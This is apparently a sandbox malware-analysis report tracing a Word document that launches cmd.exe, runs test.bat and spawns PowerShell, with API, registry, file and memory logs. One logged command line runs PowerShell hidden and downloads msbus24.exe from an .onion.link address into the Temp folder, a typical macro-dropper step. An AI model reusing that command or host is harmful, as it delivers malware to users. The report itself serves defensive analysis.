Get Address	module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7fefe309aa0	1	Fn
Get Address	module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7fefe309990	1	Fn
Get Address	module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7fefe309890	1	Fn
Get Address	module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7fefe309770	1	Fn
Get Address	module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7fefe2eb8d0	1	Fn
Get Address	module_name = Unknown module name, function = VarMonthName, address_out = 0x7fefe2eb800	1	Fn
Get Address	module_name = Unknown module name, function = VarAdd, address_out = 0x7fefe3048e0	1	Fn
Get Address	module_name = Unknown module name, function = VarAnd, address_out = 0x7fefe309470	1	Fn
Get Address	module_name = Unknown module name, function = VarCat, address_out = 0x7fefe3096a0	1	Fn
Get Address	module_name = Unknown module name, function = VarDiv, address_out = 0x7fefe302fe0	1	Fn
Get Address	module_name = Unknown module name, function = VarEqv, address_out = 0x7fefe309cf0	1	Fn
Get Address	module_name = Unknown module name, function = VarIdiv, address_out = 0x7fefe308ff0	1	Fn
Get Address	module_name = Unknown module name, function = VarImp, address_out = 0x7fefe309c00	1	Fn
Get Address	module_name = Unknown module name, function = VarMod, address_out = 0x7fefe308e60	1	Fn
Get Address	module_name = Unknown module name, function = VarMul, address_out = 0x7fefe303690	1	Fn
Get Address	module_name = Unknown module name, function = VarOr, address_out = 0x7fefe3092d0	1	Fn
Get Address	module_name = Unknown module name, function = VarPow, address_out = 0x7fefe302e80	1	Fn
Get Address	module_name = Unknown module name, function = VarSub, address_out = 0x7fefe303f90	1	Fn
Get Address	module_name = Unknown module name, function = VarXor, address_out = 0x7fefe3091a0	1	Fn
Get Address	module_name = Unknown module name, function = VarAbs, address_out = 0x7fefe2e7c30	1	Fn
Get Address	module_name = Unknown module name, function = VarFix, address_out = 0x7fefe2e7a60	1	Fn
Get Address	module_name = Unknown module name, function = VarInt, address_out = 0x7fefe2e7890	1	Fn
Get Address	module_name = Unknown module name, function = VarNeg, address_out = 0x7fefe2e7ea0	1	Fn
Get Address	module_name = Unknown module name, function = VarNot, address_out = 0x7fefe309600	1	Fn
Get Address	module_name = Unknown module name, function = VarRound, address_out = 0x7fefe2e76a0	1	Fn
Get Address	module_name = Unknown module name, function = VarCmp, address_out = 0x7fefe3083f0	1	Fn
Get Address	module_name = Unknown module name, function = VarDecAdd, address_out = 0x7fefe2b3070	1	Fn
Get Address	module_name = Unknown module name, function = VarDecCmp, address_out = 0x7fefe2bd700	1	Fn
Get Address	module_name = Unknown module name, function = VarBstrCat, address_out = 0x7fefe2bd890	1	Fn
Get Address	module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7fefe29caf0	1	Fn
Get Address	module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7fefe2a8a00	1	Fn
Get Address	module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7fefe5ede90	1	Fn
Get Address	module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7fefe5fa4c4	1	Fn
Get Address	module_name = Unknown module name, address_out = 0x7fee9f4005c	1	Fn
Get Address	module_name = Unknown module name, function = RegisterTypeLibForUser, address_out = 0x7fefe2d6430	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_Destroy, address_out = 0x7fefc3007a4	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_GetIconSize, address_out = 0x7fefc301010	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = InitCommonControls, address_out = 0x7fefc3d8b5c	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_LoadImageA, address_out = 0x7fefc3001a8	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_SetOverlayImage, address_out = 0x7fefc300a70	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_AddMasked, address_out = 0x7fefc300b60	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_GetImageInfo, address_out = 0x7fefc301180	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_Draw, address_out = 0x7fefc300cd8	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_DrawEx, address_out = 0x7fefc300bdc	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = PropertySheetA, address_out = 0x7fefc2e5c64	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = DestroyPropertySheetPage, address_out = 0x7fefc2df018	1	Fn
Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = CreatePropertySheetPageA, address_out = 0x7fefc2dfce8	1	Fn

COM (4)

Operation	Additional Information	Count	Logfile
Get Class ID	cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject	1	Fn
Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER	1	Fn
Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER	1	Fn
Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn

Keyboard (4)

Operation	Additional Information	Success	Count	Logfile
Read	virtual_key_code = VK_SHIFT, result_out = 0		1	Fn
Read	virtual_key_code = VK_CANCEL, result_out = 0		3	Fn

System (3)

Operation	Additional Information	Success	Count	Logfile

Process #2: cmd.exe

(Host: 180, Network: 0)

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	cmd /c C:\Users\HJRD1K~1\AppData\Local\Temp\test.bat
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:35, Reason: Terminated by Timeout
Monitor Duration	00:01:48

OS Process Information

Information	Value
PID	0xa08
Parent PID	0x944 (c:\program files\microsoft office\office15\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f3e9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A0C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x001fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000200000	0x00200000	0x0020ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000270000	0x00270000	0x0027ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000350000	0x00350000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000450000	0x00450000	0x0054ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000550000	0x00550000	0x006d7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006e0000	0x006e0000	0x00860fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000870000	0x00870000	0x01c6ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001c70000	0x01c70000	0x01fb2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01fc0000	0x0228efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x4a670000	0x4a6c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77600000	0x7771efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77720000	0x77819fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77820000	0x779c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
winbrand.dll	0x7fef4b30000	0x7fef4b37fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd940000	0x7fefd9aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefdb40000	0x7fefdbdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe060000	0x7fefe0c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefe0d0000	0x7fefe1d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefe550000	0x7fefe55dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe870000	0x7fefe89dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7fefe8a0000	0x7fefe8befff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefe8c0000	0x7fefe988fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefe9b0000	0x7fefeadcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7feff870000	0x7feff94afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feffb40000	0x7feffb40fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffda000	0x7fffffda000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions

Host Behavior

File (123)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\HJRD1K~1\AppData\Local\Temp\test.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	5	Fn
Get Info			2	Fn
Get Info	STD_INPUT_HANDLE		18	Fn
Get Info			2	Fn
Get Info	STD_ERROR_HANDLE		1	Fn
Get Info	STD_INPUT_HANDLE		1	Fn
Open	STD_OUTPUT_HANDLE		9	Fn
Open	STD_INPUT_HANDLE		6	Fn
Open	STD_INPUT_HANDLE		57	Fn
Open	STD_ERROR_HANDLE		3	Fn
Read	STD_INPUT_HANDLE	size = 8191, size_out = 351	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 340	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 329	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 316	2	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 235	2	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 69	2	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 45	2	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 30	2	Fn Data
Read	STD_INPUT_HANDLE	size = 512, size_out = 11	1	Fn Data
Read	STD_INPUT_HANDLE	size = 512, size_out = 0	1	Fn Data
Read	STD_INPUT_HANDLE	size = 512, size_out = 351	1	Fn Data
Read	STD_INPUT_HANDLE	size = 512, size_out = 340	1	Fn Data
Read	STD_INPUT_HANDLE	size = 512, size_out = 329	1	Fn Data
Write	STD_ERROR_HANDLE	size = 139	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (3)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	os_pid = 0xa20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		2	Fn
Create	C:\Windows\system32\timeout.exe	os_pid = 0x818, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (12)

Operation	Additional Information	Count	Logfile
Load	module_name = ADVAPI32.dll, base_address = 0x7feff870000	1	Fn
Get Handle	module_name = c:\windows\system32\cmd.exe	1	Fn
Get Handle	module_name = c:\windows\system32\kernel32.dll	2	Fn
Get Filename	process_name = c:\windows\system32\cmd.exe	1	Fn
Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77616d40	1	Fn
Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x776123d0	1	Fn
Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77608290	1	Fn
Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x776117e0	1	Fn
Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7feff88e470	1	Fn
Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7feff88f9b0	1	Fn
Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7feff88f660	1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-07-25 12:14:01 (UTC)		1	Fn

Environment (24)

Operation	Additional Information	Count	Logfile
Get Environment String	result_out = 3574672	3	Fn
Get Environment String	result_out = 3583712	1	Fn
Get Environment String	result_out = 3589504	1	Fn
Get Environment String	result_out = 3602080	1	Fn
Get Environment String	result_out = 3613792	7	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\hJrD1KOKY DS8lUjv\Desktop	1	Fn
Set Environment String	name = num, value = 0	1	Fn
Set Environment String	name = COPYCMD	3	Fn
Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Set Environment String	name = =ExitCodeAscii	2	Fn
Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Set Environment String	name = num, value = 1	1	Fn

Process #3: powershell.exe

(Host: 681, Network: 50)

Information	Value
ID	#3
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:00:49, Reason: Child Process
Unmonitor	End Time: 00:02:35, Reason: Terminated by Timeout
Monitor Duration	00:01:46

OS Process Information

Information	Value
PID	0xa20
Parent PID	0xa08 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f3e9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A24 0x A28 0x A2C 0x A30 0x A3C 0x A40 0x A50 0x A54 0x A58 0x A5C 0x A64 0x BCC 0x BD0 0x BF0 0x BFC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000050000	0x00050000	0x0014ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00156fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x00170000	0x00172fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000180000	0x00180000	0x001fffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00200000	0x00266fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000370000	0x00370000	0x00370fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000380000	0x00380000	0x00380fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000390000	0x00390000	0x00390fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003b0000	0x003b0000	0x003b1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003c0000	0x003c0000	0x003c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000003d0000	0x003d0000	0x003d1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003e0000	0x003e0000	0x003effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000003f0000	0x003f0000	0x00577fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x00700fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000710000	0x00710000	0x01b0ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001b10000	0x01b10000	0x01b10fff	Pagefile Backed Memory	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x01b20000	0x01b39fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001b40000	0x01b40000	0x01b40fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001b50000	0x01b50000	0x01b52fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001b60000	0x01b60000	0x01b60fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001b70000	0x01b70000	0x01b7ffff	Private Memory	Readable, Writable	Region Actions
l_intl.nls	0x01b80000	0x01b82fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001b90000	0x01b90000	0x01b9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ba0000	0x01ba0000	0x01c9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ca0000	0x01ca0000	0x01cbffff	Private Memory		Region Actions
private_0x0000000001cc0000	0x01cc0000	0x01cc0fff	Private Memory	Readable, Writable	Region Actions
sorttbls.nlp	0x01cd0000	0x01cd4fff	Memory Mapped File	Readable	Region Actions
microsoft.wsman.runtime.dll	0x01ce0000	0x01ce7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001cf0000	0x01cf0000	0x01cf0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d00000	0x01d00000	0x01d00fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001d10000	0x01d10000	0x01d8ffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001d90000	0x01d90000	0x01e6efff	Pagefile Backed Memory	Readable	Region Actions
sortkey.nlp	0x01e70000	0x01eb0fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001ec0000	0x01ec0000	0x01f3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f40000	0x01f40000	0x01fbffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x01fc0000	0x0228efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002290000	0x02290000	0x0238ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002390000	0x02390000	0x023a0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000023c0000	0x023c0000	0x0243ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002440000	0x02440000	0x02832fff	Pagefile Backed Memory	Readable	Region Actions
mscorrc.dll	0x02840000	0x02893fff	Memory Mapped File	Readable	Region Actions
private_0x00000000028b0000	0x028b0000	0x0292ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002940000	0x02940000	0x029bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a10000	0x02a10000	0x02a8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b30000	0x02b30000	0x02baffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000002bb0000	0x02bb0000	0x02cb0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002d40000	0x02d40000	0x02d4ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002d50000	0x02d50000	0x1ad4ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000001ad50000	0x1ad50000	0x1b41ffff	Private Memory	Readable, Writable	Region Actions
system.management.automation.dll	0x1b420000	0x1b701fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll.mui	0x1b710000	0x1b7cffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x000000001b7d0000	0x1b7d0000	0x1b8cffff	Private Memory	Readable, Writable	Region Actions
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x74960000	0x74a28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77600000	0x7771efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77720000	0x77819fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77820000	0x779c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x779e0000	0x779e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
powershell.exe	0x13f300000	0x13f376fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorjit.dll	0x7fee49a0000	0x7fee4b23fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x7fee4b30000	0x7fee4cc4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x7fee4cd0000	0x7fee4e3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x7fee4e40000	0x7fee54e4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x7fee54f0000	0x7fee552dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x7fee5530000	0x7fee5647fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x7fee5650000	0x7fee5865fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x7fee5870000	0x7fee5954fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x7fee5e80000	0x7fee5f29fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x7fee5f30000	0x7fee625dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x7fee69e0000	0x7fee753cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
